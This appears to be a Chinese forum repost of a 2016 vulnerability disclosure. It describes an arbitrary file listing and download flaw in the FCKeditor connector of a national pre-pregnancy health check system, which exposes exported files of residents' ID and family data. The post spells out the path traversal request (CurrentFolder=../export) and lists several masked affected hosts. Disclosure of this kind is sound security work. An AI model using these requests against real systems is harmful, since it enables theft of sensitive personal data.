HanDs
NO.2

[7月漏洞公开] 某国家级通用型健康检查系统存在任意文件遍历/下载(泄露居民身份证/家属信息涉及全国数据可高达上百GB) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

详细说明:

某国家级通用型健康检查系统存在任意文件遍历/下载(泄露居民身份证/家属信息涉及全国数据可高达百GB)。



系统:国家免费孕前优生健康检查项目医疗服务信息系统

QQ图片20160410084142.png





fck编辑器为题,其他页面都删除了,但存在一个便利目录的地址:

**.**.**.**:9202//FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../

QQ图片20160410081921.png





这个系统在export文件夹中会存储大量的XLS文件,里面都是居民档案信息,可知道web路径就可把这些文件全部下载,泄露信息,危害严重。

QQ图片20160410082201.png

QQ图片20160410082231.png



QQ图片20160410082411.png

漏洞证明:

下载(泄露居民身份证/家属信息涉及全国数据可高达百GB)。文件数据量极大,

QQ图片20160410082445.png

QQ图片20160410082553.png

QQ图片20160410082653.png





其他案例具存在:

QQ图片20160410082839.png

QQ图片20160410082812.png



是通用漏洞吗。



案例:

code 区域
**.**.**.**:9202//FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../export
**.**.**.**/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../export
**.**.**.**/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../export/
**.**.**.**/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../export
**.**.**.**/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../export
**.**.**.**/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../export

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
国家级 通用型 健康 检查 系统 存在 任意 文件 /
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组